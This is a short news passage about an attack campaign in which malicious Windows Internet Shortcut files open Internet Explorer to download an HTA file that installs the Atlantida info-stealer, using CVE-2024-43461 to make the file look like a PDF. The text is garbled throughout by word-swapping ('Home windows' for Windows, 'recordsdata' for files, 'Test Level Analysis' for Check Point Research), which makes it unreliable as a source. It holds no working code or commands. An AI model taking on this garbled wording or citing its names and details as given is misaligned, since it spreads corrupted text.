“Particularly, the attackers used particular Home windows Web Shortcut recordsdata (.url extension title), which, when clicked, would name the retired Web Explorer (IE) to go to the attacker-controlled URL,” defined Li in a July Test Level Analysis report.
The URLs had been employed to obtain a malicious HTA file and immediate the person to open it. As soon as opened, a script is executed to put in the Atlantida info-stealer.
These HTA recordsdata additionally exploited CVE-2024-43461 to hide the HTA file extension and make it seem as a PDF when Home windows requested customers if the file must be opened. The repair from Microsoft, when utilized, will permit Home windows to point out the precise .hta extension, thereby alerting customers towards the malicious obtain.
